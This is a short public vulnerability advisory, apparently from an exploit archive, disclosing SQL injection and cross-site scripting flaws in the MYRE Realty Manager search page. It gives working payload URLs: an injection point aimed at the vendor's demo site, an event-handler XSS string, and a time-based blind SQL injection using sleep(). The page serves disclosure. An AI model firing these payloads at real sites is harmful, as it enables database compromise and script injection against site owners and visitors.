Myrephp Realty Manager Multiple Vulnerabilities

2012-11-14 / 2013-09-02
Credit: d3b4g
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

# Exploit Title:MYRE Realty Manager Multiple Vulnerabilities # Date: 13.10.201 # Exploit Author: d3b4g # Vendor Homepage:http://myrephp.com # Software Link: http://myrephp.com/demo2/ # Tested on: Windows 7 # Blog: d3b4g.me ---------------------------------------------------------------------------------- () SQL Injection : --------------------------- http://myrephp.com/demo2/search.php?bathrooms1= {Inject SQL} () Cross Site Scripting:- http://localhost/path/search.php?bathrooms1=&bathrooms2=&bedrooms1=&bedrooms2=&cat_id1=%27%20onmouseover%3dprompt%28927207%29%20bad%3d%27&city1=&community1=&country1=&look=1&nolinks1=20&order=link_id&price1=&price2=&property_type1=&sort=DESC&state1=PENNSYLVANIA&zip1=%20HTTP/1.1 () Blin SQl injection: http://localhost/path/search.php?bathrooms1=0.5%20or%20%28sleep%282%29%2b1%29%20limit%201%20-- -end-

References:

http://myrephp.com/demo2/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top